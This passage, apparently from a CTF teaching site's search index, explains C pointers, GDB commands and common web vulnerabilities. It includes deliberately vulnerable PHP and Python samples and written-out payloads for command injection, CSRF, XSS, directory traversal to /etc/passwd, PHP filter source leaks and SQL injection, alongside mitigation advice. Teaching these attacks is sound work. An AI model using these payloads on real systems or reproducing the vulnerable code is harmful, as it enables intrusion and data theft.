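x = ctypes.c_int(4)        # int x = 4;
y = ctypes.pointer(x)      # int* y = &x;

address = ctypes.addressof(x)   # the address that y holds
value = y.contents.value        # equivalent to *y in C

print(hex(address))
print(value)
print(x.value + 4)              # arithmetic on the value, not on the address
```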
Arrays are a grouping of objects of the same type. They are typically created with the following syntax:
type arrayName [ arraySize ];\n
To initialize values in the array we can do:
int integers[ 10 ] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10};\n
Arrays allow programmers to group data into logical containers.
To access the individual elements of an array we access the contents by their \"index\". Most programming languages today start counting from 0. So to take our previous example:
int integers[ 10 ] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10};\n/* indexes 0 1 2 3 4 5 6 7 8 9 */\n
To access the value 6 we would use index 5:
integers[5];\n
"}, {"location": "reverse-engineering/what-is-c/#how-do-arrays-work", "title": "How do arrays work?", "text": "Arrays are a clever combination of multiplication, pointers, and programming.
Because the computer knows the data type used for every element in the array, the computer needs to simply multiply the size of the data type by the index you are looking for and then add this value to the address of the beginning of the array.
For example if we know that the base address of an array is 1000 and we know that each integer takes 8 bytes, we know that if we have 8 integers right next to each other, we can get the integer at the 4th index with the following math:
1000 + (4 * 8) = 1032\n
array [ 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ]\nindex 0 1 2 3 4 5 6 7\naddrs 1000 1008 1016 1024 1032 1040 1048 1056\n
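The same address arithmetic can be tried out in Python with the standard ctypes module. The sketch below assumes 8-byte integers to match the example. The helper name element_address is invented for illustration, and the real base address is whatever the interpreter happens to allocate.

```python
import ctypes

ELEMENT = ctypes.c_int64                       # 8-byte integers, as in the example
array = (ELEMENT * 8)(1, 2, 3, 4, 5, 6, 7, 8)


def element_address(base, index, size):
    # base + (index * size), the same math as 1000 + (4 * 8)
    return base + index * size


base = ctypes.addressof(array)
address = element_address(base, 4, ctypes.sizeof(ELEMENT))

print(element_address(1000, 4, 8))
print(ELEMENT.from_address(address).value)     # reads the element at index 4
```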
"}, {"location": "reverse-engineering/what-is-c/#memory-management", "title": "Memory Management", "text": ""}, {"location": "reverse-engineering/what-is-gdb/", "title": "The GNU Debugger (GDB)", "text": "The GNU Debugger or GDB is a powerful debugger which allows for step-by-step execution of a program. It can be used to trace program execution and is an important part of any reverse engineering toolkit.
"}, {"location": "reverse-engineering/what-is-gdb/#vanilla-gdb", "title": "Vanilla GDB", "text": "GDB without any modifications is unintuitive and obscures a lot of useful information. The plug-in pwndbg solves a lot of these problems and makes for a much more pleasant experience. But if you are constrained and have to use vanilla gdb, here are several things to make your life easier.
"}, {"location": "reverse-engineering/what-is-gdb/#starting-gdb", "title": "Starting GDB", "text": "To execute GDB and attach it to a program simply run gdb [program]
(gdb) disassemble [address/symbol]
will display the disassembly for that function/frame
GDB accepts unambiguous command abbreviations, so saying (gdb) disas main
suffices if you'd like to see the disassembly of main
Another handy thing to see while stepping through a program is the disassembly of nearby instructions:
(gdb) display/[# of instructions]i $pc [\u00b1 offset]
display
shows data with each step
/[#]i
shows how much data in the format i for instruction
$pc
means the pc, program counter, register
[\u00b1 offset]
allows you to specify how you would like the data offset from the current instruction
(gdb) display/10i $pc - 0x5
This command will show 10 instructions on screen with an offset from the next instruction of 5, giving us this display:
0x8048535 <main+6>: lock pushl -0x4(%ecx)\n 0x8048539 <main+10>: push %ebp\n=> 0x804853a <main+11>: mov %esp,%ebp\n 0x804853c <main+13>: push %ecx\n 0x804853d <main+14>: sub $0x14,%esp\n 0x8048540 <main+17>: sub $0xc,%esp\n 0x8048543 <main+20>: push $0x400\n 0x8048548 <main+25>: call 0x80483a0 <malloc@plt>\n 0x804854d <main+30>: add $0x10,%esp\n 0x8048550 <main+33>: sub $0xc,%esp\n
"}, {"location": "reverse-engineering/what-is-gdb/#deleting-views", "title": "Deleting Views", "text": "If, for whatever reason, a view no longer suits your needs, simply call (gdb) info display
which will give you a list of active displays:
Auto-display expressions now in effect:\nNum Enb Expression\n1: y /10bi $pc-0x5\n
Then simply execute (gdb) delete display 1
and your execution will resume without the display.
In order to view the state of registers with vanilla gdb, you need to run the command info registers
which will display the state of all the registers:
eax 0xf77a6ddc -142971428\necx 0xffe06b10 -2069744\nedx 0xffe06b34 -2069708\nebx 0x0 0\nesp 0xffe06af8 0xffe06af8\nebp 0x0 0x0\nesi 0xf77a5000 -142979072\nedi 0xf77a5000 -142979072\neip 0x804853a 0x804853a <main+11>\neflags 0x286 [ PF SF IF ]\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x63 99\n
If you would simply like to see the data that a single register points to, use the notation x/x $[register]
where:
x/x
means examine the memory at that address and display it in hex notation
$[register]
is the register code such as eax, rax, etc. (To print the value held in the register itself, use p/x $[register] instead.)
These commands work with vanilla gdb as well.
"}, {"location": "reverse-engineering/what-is-gdb/#setting-breakpoints", "title": "Setting Breakpoints", "text": "Setting breakpoints in GDB uses the format b*[Address/Symbol]
(gdb) b*main
: Break at the start of main
(gdb) b*0x804854d
: Break at 0x804854d
(gdb) b*0x804854d-0x100
: Break at 0x804844d
As before, in order to delete a breakpoint, you can list the available breakpoints using (gdb) info breakpoints
(don't forget about GDB's autocomplete, you don't always need to type out every command!) which will display all breakpoints:
Num Type Disp Enb Address What\n1 breakpoint keep y 0x0804852f <main>\n3 breakpoint keep y 0x0804864d <__libc_csu_init+61>\n
Then simply execute (gdb) delete 1
Note
GDB creates breakpoints chronologically and does NOT reuse numbers.
"}, {"location": "reverse-engineering/what-is-gdb/#stepping", "title": "Stepping", "text": "What good is a debugger if you can't control where you are going? In order to begin execution of a program, use the command r [arguments]
similar to how if you ran it with dot-slash notation you would execute it ./program [arguments]
. If no breakpoints are set, the program will run normally to completion. If you have breakpoints set, execution will stop at the first one that is hit.
(gdb) continue [# of breakpoints]
: Resumes the execution of the program until it finishes or until another breakpoint is hit (shorthand c
)(gdb) step [# of instructions]
: Steps into an instruction the specified number of times, default is 1 (shorthand s
)(gdb) nexti [# of instructions]
: Steps over an instruction meaning it will not delve into called functions (shorthand ni
)(gdb) finish
: Finishes a function and breaks after it gets returned (shorthand fin
)Examining data in GDB is also very useful for seeing how the program is affecting data. The notation may seem complex at first, but it is flexible and provides powerful functionality.
(gdb) x/[#][size][format] [Address/Symbol/Register][\u00b1 offset]
x/
means examine[#]
means how much[size]
means what size the data should be such as a byte b (1 byte), halfword h (2 bytes), word w (4 bytes), or giant word g (8 bytes)[format]
means how the data should be interpreted such as an instruction i, a string s, hex bytes x[Address/Symbol][\u00b1 offset]
means where to start interpreting the data(gdb) x/x $rax
: Displays the memory at the address held in the register RAX as hex(gdb) x/i 0xdeadbeef
: Displays the instruction at address 0xdeadbeef(gdb) x/10s 0x893e10
: Displays 10 strings at the address(gdb) x/10gx 0x7fe10
: Displays 10 giant words as hex at the addressIf the program happens to be an accept-and-fork server, gdb will have issues following the child or parent processes. In order to specify which process gdb should follow after a fork, you can use the command set follow-fork-mode [parent/child]
If you would like to set data at any point, it is possible using the command set [Register/{type}Address]=[Hex Data]
set $rax=0x0
: Sets the register rax to 0set {int}0x1e4a70=0x123
: Sets the data at 0x1e4a70 to 0x123A handy way to find the process's mapped address spaces is to use info proc map
:
Mapped address spaces:\n\n Start Addr End Addr Size Offset objfile\n 0x8048000 0x8049000 0x1000 0x0 /directory/program\n 0x8049000 0x804a000 0x1000 0x0 /directory/program\n 0x804a000 0x804b000 0x1000 0x1000 /directory/program\n 0xf75cb000 0xf75cc000 0x1000 0x0\n 0xf75cc000 0xf7779000 0x1ad000 0x0 /lib32/libc-2.23.so\n 0xf7779000 0xf777b000 0x2000 0x1ac000 /lib32/libc-2.23.so\n 0xf777b000 0xf777c000 0x1000 0x1ae000 /lib32/libc-2.23.so\n 0xf777c000 0xf7780000 0x4000 0x0\n 0xf778b000 0xf778d000 0x2000 0x0 [vvar]\n 0xf778d000 0xf778f000 0x2000 0x0 [vdso]\n 0xf778f000 0xf77b1000 0x22000 0x0 /lib32/ld-2.23.so\n 0xf77b1000 0xf77b2000 0x1000 0x0\n 0xf77b2000 0xf77b3000 0x1000 0x22000 /lib32/ld-2.23.so\n 0xf77b3000 0xf77b4000 0x1000 0x23000 /lib32/ld-2.23.so\n 0xffc59000 0xffc7a000 0x21000 0x0 [stack]\n
This will show you where the stack, heap (if there is one), and libc are located.
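When scripting around this output, it can help to pull the base addresses out programmatically. The following is a minimal Python sketch that parses a few rows copied from the sample table above; the helper names `parse_mappings` and `base_address` are hypothetical and not part of gdb.

```python
# A few rows copied from the sample mapping table above:
# start address, end address, size, offset, objfile.
SAMPLE = '''
0x8048000 0x8049000 0x1000 0x0 /directory/program
0xf75cc000 0xf7779000 0x1ad000 0x0 /lib32/libc-2.23.so
0xf7779000 0xf777b000 0x2000 0x1ac000 /lib32/libc-2.23.so
0xffc59000 0xffc7a000 0x21000 0x0 [stack]
'''

def parse_mappings(text):
    # Return a list of (start, end, objfile) tuples, one per mapping row.
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or not fields[0].startswith('0x'):
            continue  # skip blank lines and header rows
        objfile = fields[4] if len(fields) > 4 else ''
        rows.append((int(fields[0], 16), int(fields[1], 16), objfile))
    return rows

def base_address(rows, needle):
    # Lowest start address among mappings whose objfile contains needle.
    starts = [start for start, _end, objfile in rows if needle in objfile]
    return min(starts) if starts else None

rows = parse_mappings(SAMPLE)
print(hex(base_address(rows, 'libc')))     # 0xf75cc000
print(hex(base_address(rows, '[stack]')))  # 0xffc59000
```

With ASLR enabled these addresses change between runs, so values parsed this way are only valid for the process they were read from.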
"}, {"location": "reverse-engineering/what-is-gdb/#attaching-processes", "title": "Attaching Processes", "text": "Another useful feature of GDB is to attach to processes which are already running. Simply launch gdb using gdb
, then find the process id of the program you would like to attach to and execute attach [pid]
.
Websites all around the world are programmed using various programming languages. While there are specific vulnerabilities in each programming language that the developer should be aware of, there are issues fundamental to the internet that can show up regardless of the chosen language or framework.
These vulnerabilities often show up in CTFs as web security challenges where the user needs to exploit a bug to gain some kind of higher level privilege.
Common vulnerabilities to see in CTF challenges:
Command Injection is a vulnerability that allows an attacker to submit system commands to a computer running a website. This happens when the application fails to encode user input that goes into a system shell. It is very common to see this vulnerability when a developer uses the system()
command or its equivalent in the programming language of the application.
import os\n\ndomain = user_input() # ctf101.org\n\nos.system('ping ' + domain)\n
The above code when used normally will ping the ctf101.org
domain.
But consider what would happen if the user_input()
function returned different data?
import os\n\ndomain = user_input() # ; ls\n\nos.system('ping ' + domain)\n
Because of the additional semicolon, the os.system()
function is instructed to run two commands.
It looks to the program as:
ping ; ls\n
Note
The semicolon terminates a command in bash and allows you to put another command after it.
Because the ping
command is being terminated and the ls
command is being added on, the ls
command will be run in addition to the empty ping command!
This is the core concept behind command injection. The ls
command could of course be switched with another command (e.g. wget, curl, bash, etc.)
Command injection is a very common means of privilege escalation within web applications and applications that interface with system commands. Many kinds of home routers take user input and directly append it to a system command. For this reason, many of those home router models are vulnerable to command injection.
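For contrast with the vulnerable `os.system('ping ' + domain)` call, here is a minimal Python sketch of two common ways to keep the input from being interpreted as shell syntax. The helper names `build_ping_command` and `build_ping_argv` are hypothetical, and nothing is executed here; the sketch only builds the command.

```python
import shlex

def build_ping_command(domain):
    # Quote the user input so a shell treats it as one literal argument
    # rather than as shell syntax (the semicolon loses its meaning).
    return 'ping ' + shlex.quote(domain)

def build_ping_argv(domain):
    # Alternative: an argument list that can be handed to subprocess.run()
    # without a shell, so no shell parsing happens at all.
    return ['ping', domain]

print(build_ping_command('ctf101.org'))  # ping ctf101.org
print(build_ping_command('; ls'))        # ping '; ls'
print(build_ping_argv('; ls'))           # ['ping', '; ls']
```

In both cases `; ls` reaches `ping` as a (nonsensical) hostname instead of being run as a second command. Input that starts with `-` could still be read by `ping` as an option, so validating the hostname remains worthwhile.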
"}, {"location": "web-exploitation/command-injection/what-is-command-injection/#example-payloads", "title": "Example Payloads", "text": ";ls
$(ls)
`ls`
A Cross Site Request Forgery or CSRF Attack, pronounced see surf, is an attack on an authenticated user which abuses their existing session in order to perform state-changing actions such as a purchase, a transfer of funds, or a change of email address.
The entire premise of CSRF is riding on the victim's authenticated session, usually by injecting malicious elements within a webpage through an <img>
tag or an <iframe>
where references to external resources are unverified.
GET
requests are often used by websites to get user input. Say a user signs in to a banking site which assigns their browser a cookie which keeps them logged in. If they transfer some money, the URL that is sent to the server might have the pattern:
http://securibank.com/transfer.do?acct=[RECIPIENT]&amount=[DOLLARS]
Knowing this format, an attacker can send an email with a hyperlink to be clicked on or they can include an image tag of 0 by 0 pixels which will automatically be requested by the browser such as:
<img src=\"http://securibank.com/transfer.do?acct=[RECIPIENT]&amount=[DOLLARS]\" width=\"0\" height=\"0\" border=\"0\">
Cross Site Scripting or XSS is a vulnerability where one user of an application can send JavaScript that is executed by the browser of another user of the same application.
This is a vulnerability because JavaScript has a high degree of control over a user's web browser.
For example JavaScript has the ability to:
By combining all of these abilities, XSS can maliciously use JavaScript to extract a user's cookies and send them to an attacker-controlled server. XSS can also modify the DOM to phish users for their passwords. This only scratches the surface of what XSS can be used to do.
XSS is typically broken down into three categories:
Reflected XSS is when an XSS exploit is provided through a URL parameter.
For example:
https://ctf101.org?data=<script>alert(1)</script>\n
You can see the XSS exploit provided in the data
GET parameter. If the application is vulnerable to reflected XSS, the application will take this data parameter value and inject it into the DOM.
For example:
<html>\n <body>\n <script>alert(1)</script>\n </body>\n</html>\n
Depending on where the exploit gets injected, it may need to be constructed differently.
Also, the exploit payload can change to fit whatever the attacker needs it to do, whether that is extracting cookies and submitting them to an external server or simply modifying the page to deface it.
One of the deficiencies of reflected XSS, however, is that it requires the victim to access the vulnerable page from an attacker-controlled resource. Notice that if the data parameter wasn't provided, the exploit wouldn't work.
In many situations, reflected XSS is detected by the browser because it is very simple for a browser to detect malicious XSS payloads in URLs.
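The reflection step can be sketched in a few lines of Python. This is only an illustration under assumptions: `render_unsafe` and `render_escaped` are hypothetical stand-ins for whatever server-side code builds the page from the `data` parameter.

```python
import html

def render_unsafe(data):
    # Vulnerable: the parameter value is pasted into the page verbatim.
    return '<html><body>' + data + '</body></html>'

def render_escaped(data):
    # html.escape turns <, >, & and quotes into entities, so the browser
    # displays the payload as text instead of running it.
    return '<html><body>' + html.escape(data) + '</body></html>'

payload = '<script>alert(1)</script>'
print(render_unsafe(payload))   # contains a live <script> element
print(render_escaped(payload))  # contains &lt;script&gt;alert(1)&lt;/script&gt;
```

Escaping like this is only appropriate when the value lands in HTML body text; as noted above, other injection points need differently constructed payloads and, correspondingly, different encoding.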
"}, {"location": "web-exploitation/cross-site-scripting/what-is-cross-site-scripting/#stored-xss", "title": "Stored XSS", "text": "Stored XSS is different from reflected XSS in one key way. In reflected XSS, the exploit is provided through a GET parameter. But in stored XSS, the exploit is provided from the website itself.
Imagine a website that allows users to post comments. If a user can submit an XSS payload as a comment, and then have others view that malicious comment, it would be an example of stored XSS.
This is because the website itself is serving the XSS payload to other users. This makes it very difficult to detect from the browser's perspective, and no browser is capable of generically preventing stored XSS from exploiting a user.
"}, {"location": "web-exploitation/cross-site-scripting/what-is-cross-site-scripting/#dom-xss", "title": "DOM XSS", "text": "DOM XSS is XSS that is due to the browser itself injecting an XSS payload into the DOM. While the server itself may properly prevent XSS, it's possible that the client side scripts may accidentally take a payload and insert it into the DOM and cause the payload to trigger.
The server itself is not to blame, but the client side JavaScript files are causing the issue.
"}, {"location": "web-exploitation/directory-traversal/what-is-directory-traversal/", "title": "Directory Traversal", "text": "Directory Traversal is a vulnerability where an application takes in user input and uses it in a directory path.
Any kind of path controlled by user input that isn't properly sanitized or properly sandboxed could be vulnerable to directory traversal.
For example, consider an application that allows the user to choose what page to load from a GET parameter.
<?php\n $page = $_GET['page']; // index.php\n include(\"/var/www/html/\" . $page);\n?>\n
Under normal operation the page would be index.php
. But what if a malicious user supplied something different?
<?php\n $page = $_GET['page']; // ../../../../../../../../etc/passwd\n include(\"/var/www/html/\" . $page);\n?>\n
Here the user is submitting ../../../../../../../../etc/passwd
.
This will result in the PHP interpreter leaving the directory that it is coded to look in ('/var/www/html') and instead be forced up to the root folder.
include(\"/var/www/html/../../../../../../../../etc/passwd\");\n
Ultimately this will become /etc/passwd
because the computer will not go a directory above its top directory.
Thus the application will load the /etc/passwd
file and emit it to the user like so:
root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false\nsystemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false\nsystemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false\n_apt:x:104:65534::/nonexistent:/bin/false\n
This same concept can be applied to applications where some input is taken from a user and then used to access a file or path or similar. This vulnerability very often can be used to leak sensitive data or extract application source code to find other vulnerabilities.
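The path collapse described above can be reproduced in Python. This is a minimal sketch, not the PHP application's actual logic: `resolve` and `is_inside_base` are hypothetical helpers, and `posixpath.normpath` only normalizes the string (it does not follow symlinks).

```python
import posixpath

BASE_DIR = '/var/www/html'

def resolve(page):
    # Join the user-supplied name onto the base directory and collapse
    # any ../ segments, the way the filesystem eventually would.
    return posixpath.normpath(posixpath.join(BASE_DIR, page))

def is_inside_base(page):
    # Accept the path only if it still lives under BASE_DIR after resolving.
    resolved = resolve(page)
    return resolved == BASE_DIR or resolved.startswith(BASE_DIR + '/')

attack = '../../../../../../../../etc/passwd'
print(resolve('index.php'))         # /var/www/html/index.php
print(resolve(attack))              # /etc/passwd
print(is_inside_base('index.php'))  # True
print(is_inside_base(attack))       # False
```

Checking the resolved path against the intended base directory, rather than searching the raw input for `../`, is one way to approximate the sandboxing mentioned earlier.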
"}, {"location": "web-exploitation/php/what-is-php/", "title": "PHP", "text": "PHP is one of the most used languages for back-end web development and therefore it has become a target by hackers. PHP is a language which makes it painful to be secure for most instances, making it every hacker's dream target.
"}, {"location": "web-exploitation/php/what-is-php/#overview", "title": "Overview", "text": "PHP is a C-like language which uses tags enclosed by <?php ... ?>
(sometimes just <? ... ?>
). It is inlined into HTML. A word of advice is to keep the PHP docs open because function names are inconsistent: the length of a function name was once used as the key in PHP's internal dictionary, so function names were shortened/lengthened to make the lookup faster. Other things include:
$name
$$name
$_GET, $_POST, $_SERVER
<?php\n if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['email']) && isset($_POST['password'])) {\n $db = new mysqli('127.0.0.1', 'cs3284', 'cs3284', 'logmein');\n $email = $_POST['email'];\n $password = sha1($_POST['password']);\n $res = $db->query(\"SELECT * FROM users WHERE email = '$email' AND password = '$password'\");\n if ($row = $res->fetch_assoc()) {\n $_SESSION['id'] = $row['id'];\n header('Location: index.php');\n die();\n }\n }\n?>\n<html>...\n
This example PHP simply checks the POST data for an email and password. If the hash of the submitted password is equal to the hashed password in the database, the user is logged in and redirected to the index page.
The line email = '$email'
uses automatic string interpolation in order to convert $email into a string to compare with the database.
PHP will do just about anything to match with a loose comparison (\\=\\=) which means things can be 'equal' (\\=\\=) or really equal (\\=\\=\\=). The implicit conversion between strings and integers is the root cause of a lot of issues in PHP.
"}, {"location": "web-exploitation/php/what-is-php/#type-comparison-table", "title": "Type Comparison Table", "text": ""}, {"location": "web-exploitation/php/what-is-php/#comparisons-of-x-with-php-functions", "title": "Comparisons of $x with PHP Functions", "text": "Expression gettype() empty() is_null() isset() boolean:if($x)
$x = \"\"; string TRUE FALSE TRUE FALSE $x = null; NULL TRUE TRUE FALSE FALSE var $x; NULL TRUE TRUE FALSE FALSE $x is undefined NULL TRUE TRUE FALSE FALSE $x = array(); array TRUE FALSE TRUE FALSE $x = array('a', 'b'); array FALSE FALSE TRUE TRUE $x = false; boolean TRUE FALSE TRUE FALSE $x = true; boolean FALSE FALSE TRUE TRUE $x = 1; integer FALSE FALSE TRUE TRUE $x = 42; integer FALSE FALSE TRUE TRUE $x = 0; integer TRUE FALSE TRUE FALSE $x = -1; integer FALSE FALSE TRUE TRUE $x = \"1\"; string FALSE FALSE TRUE TRUE $x = \"0\"; string TRUE FALSE TRUE FALSE $x = \"-1\"; string FALSE FALSE TRUE TRUE $x = \"php\"; string FALSE FALSE TRUE TRUE $x = \"true\"; string FALSE FALSE TRUE TRUE $x = \"false\"; string FALSE FALSE TRUE TRUE"}, {"location": "web-exploitation/php/what-is-php/#comparisons", "title": "\"==\" Comparisons", "text": "TRUE FALSE 1 0 -1 \"1\" \"0\" \"-1\" NULL array() \"php\" \"\" TRUE ==TRUE== FALSE ==TRUE== FALSE ==TRUE== ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE ==TRUE== ==TRUE== FALSE ==TRUE== 1 ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE 0 FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE ==TRUE== FALSE ==TRUE== ==TRUE== -1 ==TRUE== FALSE FALSE FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE \"1\" ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE \"0\" FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE \"-1\" ==TRUE== FALSE FALSE FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE NULL FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE FALSE FALSE ==TRUE== ==TRUE== FALSE ==TRUE== array() FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== ==TRUE== FALSE FALSE \"php\" ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE \"\" FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE ==TRUE=="}, {"location": 
"web-exploitation/php/what-is-php/#comparisons_1", "title": "\"===\" Comparisons", "text": "TRUE FALSE 1 0 -1 \"1\" \"0\" \"-1\" NULL array() \"php\" \"\" TRUE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE 1 FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE 0 FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE -1 FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE \"1\" FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE \"0\" FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE \"-1\" FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE NULL FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE array() FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE \"php\" FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE \"\" FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE=="}, {"location": "web-exploitation/php/what-is-php/#file-inclusion", "title": "File Inclusion", "text": "PHP has multiple ways to include other source files such as require, require_once and include. These can take a dynamic string such as require $_GET['page'] . \".php\";
which is usually seen in templating.
PHP has its own URL scheme: php://...
and its main purpose is to filter output automatically. It can automatically remove certain HTML tags and can base64 encode as well.
$fp = fopen('php://output', 'w');\nstream_filter_append(\n $fp,\n 'string.strip_tags',\n STREAM_FILTER_WRITE,\n array('b','i','u'));\nfwrite($fp, \"<b>bolded text</b> enlarged to a <h1>level 1 heading</h1>\\n\");\n/* <b>bolded text</b> enlarged to a level 1 heading */\n
"}, {"location": "web-exploitation/php/what-is-php/#exploitation", "title": "Exploitation", "text": "These filters can also be used on input such as:
php://filter/convert.base64-encode/resource={file}
include
, file_get_contents()
, etc. support URLs including PHP stream filter URLs (php://
)include
normally evaluates any PHP code (in tags) it finds, but if it\u2019s base64 encoded it can be used to leak sourceServer Side Request Forgery or SSRF is where an attacker is able to cause a web application to send a request that the attacker defines.
For example, say there is a website that lets you take a screenshot of any site on the internet.
Under normal usage a user might ask it to take a screenshot of a page like Google, or The New York Times. But what if a user does something more nefarious? What if they asked the site to take a picture of http://localhost ? Or perhaps tries to access something more useful like http://localhost/server-status ?
Note
127.0.0.1 (also known as localhost or loopback) represents the computer itself. Accessing localhost means you are accessing the computer's own internal network. Developers often use localhost as a way to access the services they have running on their own computers.
Depending on what the response from the site is the attacker may be able to gain additional information about what's running on the computer itself.
In addition, the requests originating from the server would come from the server's IP, not the attacker's IP. Because of that, it is possible that the attacker might be able to access internal resources that they wouldn't normally be able to access.
Another usage for SSRF is to create a simple port scanner to scan the internal network looking for internal services.
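To make the localhost concern concrete, here is a minimal Python sketch of a pre-flight check a screenshot service might run before fetching a URL. The function name `targets_internal_host` is hypothetical, and the check is deliberately incomplete: DNS names are not resolved, so a hostname that points at an internal address would slip through.

```python
import ipaddress
from urllib.parse import urlsplit

def targets_internal_host(url):
    # Returns True when the URL clearly points at the server itself or at
    # a private network range.
    host = urlsplit(url).hostname
    if host is None:
        return True  # treat unparseable URLs as unsafe
    if host == 'localhost':
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: it would need resolving before a real decision.
        return False
    return address.is_loopback or address.is_private or address.is_link_local

print(targets_internal_host('http://localhost/server-status'))  # True
print(targets_internal_host('http://127.0.0.1/'))               # True
print(targets_internal_host('http://10.0.0.5:8080/'))           # True
print(targets_internal_host('https://www.google.com/'))         # False
```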
"}, {"location": "web-exploitation/sql-injection/what-is-sql-injection/", "title": "SQL Injection", "text": "SQL Injection is a vulnerability where an application takes input from a user and doesn't vaildate that the user's input doesn't contain additional SQL.
<?php\n $username = $_GET['username']; // kchung\n $result = mysql_query(\"SELECT * FROM users WHERE username='$username'\");\n?>\n
If we look at the $username variable, under normal operation we might expect the username parameter to be a real username (e.g. kchung).
But a malicious user might submit a different kind of data. For example, consider if the input was '
?
The application would crash because the resulting SQL query is incorrect.
SELECT * FROM users WHERE username='''\n
Note
Notice the extra single quote at the end.
With the knowledge that a single quote will cause an error in the application we can expand a little more on SQL Injection.
What if our input was ' OR 1=1
?
SELECT * FROM users WHERE username='' OR 1=1\n
1 is indeed equal to 1. This equates to true in SQL. If we reinterpret this the SQL statement is really saying
SELECT * FROM users WHERE username='' OR true\n
This will return every row in the table because the WHERE condition evaluates to true for every row that exists.
We can also inject comments and termination characters like --
or /*
or ;
. This allows you to terminate SQL queries after your injected statements. For example '--
is a common SQL injection payload.
SELECT * FROM users WHERE username=''-- '\n
This payload sets the username parameter to an empty string to break out of the query and then adds a comment (--
) that effectively hides the second single quote.
Using this technique of adding SQL statements to an existing query we can force a database to return data that it was not meant to return.
"}, {"location": "web-exploitation/sql-injection/what-is-sql-injection/#preventing-sql-injection", "title": "Preventing SQL Injection", "text": "The best way to prevent SQL Injection is to use prepared statements. Prepared statements are a way to execute SQL queries that separates the query logic from the data being passed into the query.
<?php\n $stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username');\n $stmt->execute(['username' => $username]);\n?>\n
In this example, the :username
is a placeholder that is replaced with the value of the $username
variable. The database driver will automatically escape the value of $username
to prevent SQL Injection.
Another way to prevent SQL Injection is to use an ORM (Object Relational Mapping) library. ORM libraries abstract the database layer and allow you to interact with the database using objects instead of raw SQL queries.
<?php\n $user = User::where('username', $username)->first();\n?>\n
ORM libraries automatically escape user input to prevent SQL Injection.
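The difference between string concatenation and a parameterized query can be tried safely against an in-memory database. The sketch below uses Python's built-in `sqlite3` module rather than PHP and MySQL, so the table contents and the helper names `find_user_unsafe` and `find_user_safe` are assumptions made for illustration.

```python
import sqlite3

db = sqlite3.connect(':memory:')
db.execute('CREATE TABLE users (username TEXT)')
db.executemany('INSERT INTO users VALUES (?)', [('kchung',), ('admin',)])

def find_user_unsafe(username):
    # Vulnerable: the input is pasted straight into the SQL text.
    query = "SELECT * FROM users WHERE username='" + username + "'"
    return db.execute(query).fetchall()

def find_user_safe(username):
    # Parameterized: the value travels separately from the SQL text,
    # so it can never change the structure of the query.
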